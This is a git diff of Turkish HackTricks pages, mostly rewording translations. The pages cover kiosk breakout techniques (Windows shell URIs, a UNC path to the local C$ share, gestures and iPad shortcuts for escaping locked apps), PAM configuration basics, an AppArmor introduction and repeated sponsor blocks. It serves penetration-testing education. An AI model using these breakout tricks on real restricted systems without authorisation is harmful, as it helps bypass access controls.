* **Kabuk URI'ları**: _shell:Yönetici Araçları, shell:Belgeler Kitaplığı, shell:Kütüphaneler shell:KullanıcıProfilleri, shell:Kişisel, shell:AramaAnaKlasör, shell:Sistemshell:AğYerleriKlasörü, shell:Gönder, shell:KullanıcıProfilleri, shell:Ortak Yönetici Araçları, shell:BilgisayarımKlasörü, shell:İnternetKlasörü_
|
||||
* **Kabuk URI'ları**: _shell:Yönetici Araçları, shell:Belgeler Kütüphanesi, shell:Kütüphaneler shell:KullanıcıProfilleri, shell:Kişisel, shell:AramaAnaKlasör, shell:Sistemshell:AğYerleriKlasörü, shell:Gönder, shell:KullanıcıProfilleri, shell:Ortak Yönetici Araçları, shell:BilgisayarımKlasörü, shell:İnternetKlasörü_
|
||||
* **UNC yolları**: Paylaşılan klasörlere bağlanmak için yollar. Yerel makinenin C$'sine bağlanmayı denemelisiniz ("\\\127.0.0.1\c$\Windows\System32")
|
||||
* **Daha fazla UNC yolu:**
|
||||
|
||||
|
@ -127,14 +127,14 @@ Kayıt defteri düzenleyici: [https://sourceforge.net/projects/uberregedit/](htt
|
|||
|
||||
* Tüm açık Pencereleri görmek için sol taraftan sağa kaydırarak KIOSK uygulamasını küçültün ve doğrudan işletim sistemine erişin;
|
||||
* Sağ taraftan sola kaydırarak Eylem Merkezi'ni açın, KIOSK uygulamasını küçültün ve doğrudan işletim sistemine erişin;
|
||||
* Üst kenardan içeri kaydırarak tam ekran modunda açılan bir uygulama için başlık çubuğunu görünür hale getirin;
|
||||
* Alt kenardan yukarı kaydırarak tam ekran bir uygulamada görev çubuğunu gösterin.
|
||||
* Tam ekran modunda açılan bir uygulama için başlık çubuğunu görünür hale getirmek için üst kenardan içeri kaydırın;
|
||||
* Tam ekran uygulamada görev çubuğunu göstermek için alttan yukarı kaydırın.
|
||||
|
||||
## Internet Explorer Hileleri
|
||||
|
||||
### 'Resim Araç Çubuğu'
|
||||
|
||||
Tıklanıldığında resmin sol üst köşesinde görünen bir araç çubuğudur. Kaydedebilir, Yazdırabilir, Mail gönderebilir, "Resimlerim"i Explorer'da açabilirsiniz. Kiosk'un Internet Explorer'ı kullanıyor olması gerekmektedir.
|
||||
Tıklanıldığında resmin sol üst köşesinde görünen bir araç çubuğudur. Kaydetme, Yazdırma, Mailto, "Resimlerim"i Explorer'da açma gibi işlemleri yapabilirsiniz. Kiosk'un Internet Explorer'ı kullanıyor olması gerekmektedir.
|
||||
|
||||
### Shell Protokolü
|
||||
|
||||
|
@ -184,93 +184,93 @@ Kaynak: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811
|
|||
|
||||
* Dört veya beş parmakla bir yöne kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
|
||||
|
||||
* Beş parmakla ekrana sıkıştırın / Ana düğmeye dokunun / Ekranda hızlı bir şekilde aşağıdan yukarıya doğru bir parmakla kaydırarak Ana ekrana erişin: Ana ekrana erişmek için
|
||||
* Beş parmakla ekrana sıkıştırın / Ana düğmeye dokunun / Ekrana alttan hızlı bir şekilde yukarı doğru bir parmakla kaydırın: Ana ekrana erişmek için
|
||||
|
||||
* Ekranda sadece 1-2 inç (yavaşça) aşağıdan bir parmakla kaydırın: Dock görünecektir
|
||||
* Ekrana alttan sadece 1-2 inç (yavaş) bir parmakla yukarı doğru kaydırın: Dock görünecektir
|
||||
|
||||
* Ekranda en üstten bir parmakla aşağı kaydırın: Bildirimlerinizi görmek için
|
||||
* Ekrana üstten 1 parmakla aşağı doğru kaydırın: Bildirimlerinizi görmek için
|
||||
|
||||
* Ekranda en üst sağ köşeden bir parmakla aşağı kaydırın: iPad Pro'nun kontrol merkezini görmek için
|
||||
* Ekranın sağ üst köşesinden 1 parmakla aşağı doğru kaydırın: iPad Pro'nun kontrol merkezini görmek için
|
||||
|
||||
* Ekranda sol kenardan 1-2 inç (hızlıca) bir parmakla kaydırın: Bugün görünümünü görmek için
|
||||
* Ekrandan sol tarafa 1-2 inçlik bir parmakla kaydırın: Bugün görünümünü görmek için
|
||||
|
||||
* Ekranda merkezden hızlıca sağa veya sola doğru bir parmakla kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
|
||||
* Ekrandan hızlıca sağa veya sola doğru 1 parmakla kaydırın: Bir sonraki/önceki Uygulamaya geçmek için
|
||||
|
||||
* Üst sağ köşedeki On/**Off**/Sleep düğmesini basılı tutun + **iPad'ın sağ üst köşesindeki** Kaydırarak **kapat** kaydırıcısını tamamen sağa kaydırın: Kapatmak için
|
||||
* Üst sağ köşesindeki On/**Off**/Sleep düğmesini basılı tutun ve **iPad'ın sağ üst köşesindeki kaydırıcıyı** tamamen sağa kaydırın: Kapatmak için
|
||||
|
||||
* **iPad'ın sağ üst köşesindeki** On/**Off**/Sleep düğmesine ve Ana düğmeye birkaç saniye basılı tutun: Zorla kapatmak için
|
||||
* **iPad'ın sağ üst köşesindeki On/**Off**/Sleep düğmesine ve Ana düğmesine birkaç saniye basılı tutun**: Zorla kapatmak için
|
||||
|
||||
* **iPad'ın sağ üst köşesindeki** On/**Off**/Sleep düğmesine ve Ana düğmeye hızlıca basın: Ekranda sol alt köşede belirecek bir ekran görüntüsü almak için. Her iki düğmeye de aynı anda çok kısa süre basın, birkaç saniye basılı tutarsanız zorla kapatma gerçekleşir.
|
||||
* **iPad'ın sağ üst köşesindeki On/**Off**/Sleep düğmesine ve Ana düğmesine hızlıca basın**: Ekranda sol alt köşede belirecek bir ekran görüntüsü almak için. Her iki düğmeye de aynı anda çok kısa süre basın, birkaç saniye basılı tutarsanız zorla kapatma gerçekleşir.
|
||||
|
||||
## Kısayollar
|
||||
|
||||
Bir iPad klavyesine veya USB klavye adaptörüne sahip olmalısınız. Uygulamadan kaçmak için yararlı olabilecek yalnızca kısayollar burada gösterilecektir.
|
||||
Bir iPad klavyeniz veya USB klavye adaptörünüz olmalıdır. Uygulamadan kaçmak için yararlı olabilecek yalnızca kısayollar burada gösterilecektir.
|
||||
|
||||
| Tuş | Adı |
|
||||
| Tuş | İsim |
|
||||
| --- | ------------ |
|
||||
| ⌘ | Komut |
|
||||
| ⌥ | Seçenek (Alt)|
|
||||
| ⌘ | Komut |
|
||||
| ⌥ | Seçenek (Alt) |
|
||||
| ⇧ | Shift |
|
||||
| ↩ | Return |
|
||||
| ⇥ | Sekme |
|
||||
| ⇥ | Tab |
|
||||
| ^ | Kontrol |
|
||||
| ← | Sol Ok |
|
||||
| → | Sağ Ok |
|
||||
| ↑ | Yukarı Ok |
|
||||
| ↓ | Aşağı Ok |
|
||||
| ← | Sol Ok |
|
||||
| → | Sağ Ok |
|
||||
| ↑ | Yukarı Ok |
|
||||
| ↓ | Aşağı Ok |
|
||||
|
||||
### Sistem kısayolları
|
||||
|
||||
Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayarları içindir.
|
||||
|
||||
| Kısayol | Eylem |
|
||||
| ------- | ----------------------------------------------------------------------------- |
|
||||
| F1 | Ekranı Karart |
|
||||
| F2 | Ekranı Parlakla |
|
||||
| F7 | Bir şarkı geriye git |
|
||||
| F8 | Oynat/Duraklat |
|
||||
| F9 | Bir şarkı ileri git |
|
||||
| F10 | Sesi Kapat |
|
||||
| F11 | Sesi Azalt |
|
||||
| F12 | Sesi Artır |
|
||||
| ⌘ Space | Mevcut dillerin listesini görüntüler; birini seçmek için tekrar boşluğa dokunun. |
|
||||
| -------- | ------------------------------------------------------------------------------ |
|
||||
| F1 | Ekranı Karart |
|
||||
| F2 | Ekranı Parlakla |
|
||||
| F7 | Bir şarkı geriye git |
|
||||
| F8 | Oynat/Duraklat |
|
||||
| F9 | Bir sonraki şarkıya geç |
|
||||
| F10 | Sessiz |
|
||||
| F11 | Ses düzeyini azalt |
|
||||
| F12 | Ses düzeyini artır |
|
||||
| ⌘ Space | Mevcut dillerin listesini görüntüler; birini seçmek için tekrar boşluğa dokunun. |
|
||||
|
||||
### iPad gezinme
|
||||
|
||||
| Kısayol | Eylem |
|
||||
| ------------------------------------------------- | ------------------------------------------------------- |
|
||||
| ⌘H | Ana ekrana git |
|
||||
| ⌘⇧H (Komut-Shift-H) | Ana ekrana git |
|
||||
| ⌘ (Boşluk) | Spotlight'ı aç |
|
||||
| ⌘⇥ (Komut-Tab) | Son on kullanılan uygulamaları listeler |
|
||||
| ⌘\~ | Son Uygulamaya git |
|
||||
| ⌘⇧3 (Komut-Shift-3) | Ekran görüntüsü al (alt sol köşede kaydetme veya işlem yapma) |
|
||||
| ⌘⇧4 | Ekran görüntüsü al ve düzenleyicide aç |
|
||||
| ⌘'yi basılı tutun | Uygulama için mevcut kısayolların listesi |
|
||||
| ⌘⌥D (Komut-Option/Alt-D) | Dock'u açar |
|
||||
| ^⌥H (Kontrol-Option-H) | Ana düğme |
|
||||
| ^⌥H H (Kontrol-Option-H-H) | Çoklu görev çubuğunu göster |
|
||||
| ^⌥I (Kontrol-Option-i) | Öğe seçici |
|
||||
| Escape | Geri düğmesi |
|
||||
| → (Sağ ok) | Sonraki öğe |
|
||||
| ← (Sol ok) | Önceki öğe |
|
||||
| ↑↓ (Yukarı ok, Aşağı ok) | Seçili öğeye aynı anda dokun |
|
||||
| ⌥ ↓ (Seçenek-Aşağı ok) | Aşağı kaydır |
|
||||
| ⌥↑ (Seçenek-Yukarı ok) | Yukarı kaydır |
|
||||
| ⌥← veya ⌥→ (Seçenek-Sol ok veya Seçenek-Sağ ok) | Sola veya sağa kaydır |
|
||||
| ^⌥S (Kontrol-Option-S) | VoiceOver konuşmasını aç veya kapat |
|
||||
| ⌘⇧⇥ (Komut-Shift-Tab) | Önceki uygulamaya geç |
|
||||
| ⌘⇥ (Komut-Tab) | Orijinal uygulamaya geri dön |
|
||||
| ←+→, sonra Seçenek + ← veya Seçenek+→ | Dock'tan geçiş yap |
|
||||
| -------------------------------------------------- | ------------------------------------------------------- |
|
||||
| ⌘H | Ana ekrana git |
|
||||
| ⌘⇧H (Komut-Shift-H) | Ana ekrana git |
|
||||
| ⌘ (Space) | Spotlight'ı Aç |
|
||||
| ⌘⇥ (Komut-Tab) | Son on kullanılan uygulamaları listeler |
|
||||
| ⌘\~ | Son Uygulamaya Git |
|
||||
| ⌘⇧3 (Komut-Shift-3) | Ekran Görüntüsü Al (alt sol köşede kaydetme veya işlem yapma) |
|
||||
| ⌘⇧4 | Ekran Görüntüsü Al ve düzenleyicide aç |
|
||||
| ⌘'yi basılı tutun | Uygulama için mevcut kısayolların listesi |
|
||||
| ⌘⌥D (Komut-Option/Alt-D) | Dock'u aç |
|
||||
| ^⌥H (Kontrol-Option-H) | Ana düğme |
|
||||
| ^⌥H H (Kontrol-Option-H-H) | Çoklu görev çubuğunu göster |
|
||||
| ^⌥I (Kontrol-Option-i) | Öğe seçici |
|
||||
| Escape | Geri düğmesi |
|
||||
| → (Sağ ok) | Sonraki öğe |
|
||||
| ← (Sol ok) | Önceki öğe |
|
||||
| ↑↓ (Yukarı ok, Aşağı ok) | Seçili öğeye aynı anda dokunun |
|
||||
| ⌥ ↓ (Seçenek-Aşağı ok) | Aşağı kaydır |
|
||||
| ⌥↑ (Seçenek-Yukarı ok) | Yukarı kaydır |
|
||||
| ⌥← veya ⌥→ (Seçenek-Sol ok veya Seçenek-Sağ ok) | Sola veya sağa kaydır |
|
||||
| ^⌥S (Kontrol-Option-S) | VoiceOver konuşmasını aç veya kapat |
|
||||
| ⌘⇧⇥ (Komut-Shift-Tab) | Önceki uygulamaya geç |
|
||||
| ⌘⇥ (Komut-Tab) | Orijinal uygulamaya geri dön |
|
||||
| ←+→, sonra Seçenek + ← veya Seçenek+→ | Dock'ta gezinmek için |
|
||||
### Safari kısayolları
|
||||
|
||||
| Kısayol | Eylem |
|
||||
| Kısayol | Eylem |
|
||||
| ----------------------- | ----------------------------------------------- |
|
||||
| ⌘L (Command-L) | Konumu Aç |
|
||||
| ⌘T | Yeni bir sekme aç |
|
||||
| ⌘W | Geçerli sekmeyi kapat |
|
||||
| ⌘R | Geçerli sekmeyi yenile |
|
||||
| ⌘. | Geçerli sekmeyi yüklemeyi durdur |
|
||||
| ⌘W | Geçerli sekme kapat |
|
||||
| ⌘R | Geçerli sekme yenile |
|
||||
| ⌘. | Geçerli sekmenin yüklenmesini durdur |
|
||||
| ^⇥ | Sonraki sekmeye geç |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Önceki sekmeye git |
|
||||
| ⌘L | Metin girişi/URL alanını seçerek düzenleme yap |
|
||||
|
@ -285,9 +285,9 @@ Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayar
|
|||
| -------------------------- | ---------------------------- |
|
||||
| ⌘L | Konumu Aç |
|
||||
| ⌘T | Yeni bir sekme aç |
|
||||
| ⌘W | Geçerli sekmeyi kapat |
|
||||
| ⌘R | Geçerli sekmeyi yenile |
|
||||
| ⌘. | Geçerli sekmeyi yüklemeyi durdur |
|
||||
| ⌘W | Geçerli sekme kapat |
|
||||
| ⌘R | Geçerli sekme yenile |
|
||||
| ⌘. | Geçerli sekmenin yüklenmesini durdur |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Posta kutunuzda arama yap |
|
||||
|
||||
# Referanslar
|
||||
|
@ -298,11 +298,11 @@ Bu kısayollar, iPad'in kullanımına bağlı olarak görsel ayarlar ve ses ayar
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) bir **dark-web** destekli arama motoru olup, bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io) bir **dark-web** destekli arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -314,12 +314,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
|
||||
* **💬 [Discord grubuna katılın](https://discord.gg/hRep4RUj7f)** veya [telegram grubuna katılın](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR'lar göndererek paylaşın.**
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -33,7 +33,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
### Yapılandırma Dosyaları
|
||||
|
||||
- **Solaris ve UNIX tabanlı sistemler** genellikle `/etc/pam.conf` konumunda merkezi bir yapılandırma dosyası kullanır.
|
||||
- **Linux sistemleri** genellikle hizmete özgü yapılandırmaları `/etc/pam.d` içinde depolayarak dizin yaklaşımını tercih eder. Örneğin, giriş hizmeti için yapılandırma dosyası `/etc/pam.d/login` konumundadır.
|
||||
- **Linux sistemleri** genellikle hizmete özgü yapılandırmaları `/etc/pam.d` içinde saklayarak dizin yaklaşımını tercih eder. Örneğin, giriş hizmeti için yapılandırma dosyası `/etc/pam.d/login` konumundadır.
|
||||
|
||||
Giriş hizmeti için bir PAM yapılandırma örneği şöyle olabilir:
|
||||
```text
|
||||
|
@ -52,18 +52,18 @@ session required /lib/security/pam_unix_session.so
|
|||
|
||||
Bu alanlar veya yönetim grupları, kimlik doğrulama ve oturum yönetimi sürecinin farklı yönlerinden sorumlu olan **auth**, **account**, **password** ve **session** içerir:
|
||||
|
||||
- **Auth**: Genellikle bir şifre isteyerek kullanıcı kimliğini doğrular.
|
||||
- **Auth**: Kullanıcı kimliğini doğrular, genellikle bir şifre isteyerek.
|
||||
- **Account**: Hesap doğrulamasını ele alır, grup üyeliği veya günün saati gibi koşulları kontrol eder.
|
||||
- **Password**: Şifre güncellemelerini yönetir, karmaşıklık kontrolleri veya sözlük saldırıları önlemlerini içerir.
|
||||
- **Session**: Hizmet oturumunun başlangıcında veya sonunda işlemleri yönetir, örneğin dizinleri bağlama veya kaynak sınırlarını belirleme.
|
||||
- **Session**: Hizmet oturumunun başlangıcında veya sonunda işlemleri yönetir, örneğin dizinleri bağlama veya kaynak sınırlarını ayarlama.
|
||||
|
||||
### **PAM Modül Kontrolleri**
|
||||
|
||||
Kontroller, modülün başarılı veya başarısız durumuna yanıtını belirler ve genel kimlik doğrulama sürecini etkiler. Bunlar şunları içerir:
|
||||
|
||||
- **Required**: Gerekli bir modülün başarısızlığı sonunda başarısızlıkla sonuçlanır, ancak tüm sonraki modüller kontrol edildikten sonra.
|
||||
- **Required**: Gerekli bir modülün başarısızlığı sonunda başarısızlığa neden olur, ancak tüm sonraki modüller kontrol edildikten sonra.
|
||||
- **Requisite**: Başarısızlık durumunda işlemin hemen sonlandırılması.
|
||||
- **Sufficient**: Başarı, aynı alanın geri kalan kontrol kontrollerini atlar, ancak bir sonraki modül başarısız olursa.
|
||||
- **Sufficient**: Başarı, aynı alanın geri kalan kontrolünden geçişi sağlar, ancak bir sonraki modül başarısız olursa.
|
||||
- **Optional**: Yığında tek modülse yalnızca başarısızlığa neden olur.
|
||||
|
||||
### Örnek Senaryo
|
||||
|
@ -74,11 +74,11 @@ Birden fazla kimlik doğrulama modülü olan bir kurulumda, işlem katı bir sı
|
|||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **stealer kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **stealer kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -96,7 +96,7 @@ HackTricks'i desteklemenin diğer yolları:
|
|||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak HackTricks ve HackTricks Cloud** github depolarına PR göndererek.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,23 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'de **takip edin**.
|
||||
- **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -30,9 +30,9 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Temel Bilgiler
|
||||
|
||||
AppArmor, **programlara program profilleri aracılığıyla sunulan kaynakları kısıtlamayı amaçlayan bir çekirdek geliştirmesidir**, etkin bir şekilde Zorunlu Erişim Kontrolü (MAC) uygulayarak erişim kontrol özelliklerini doğrudan kullanıcılara bağlamak yerine programlara bağlar. Bu sistem, genellikle önyükleme sırasında profilleri çekirdeğe **yükleyerek çalışır** ve bu profiller, bir programın erişebileceği kaynakları belirler, örneğin ağ bağlantıları, ham soket erişimi ve dosya izinleri gibi.
|
||||
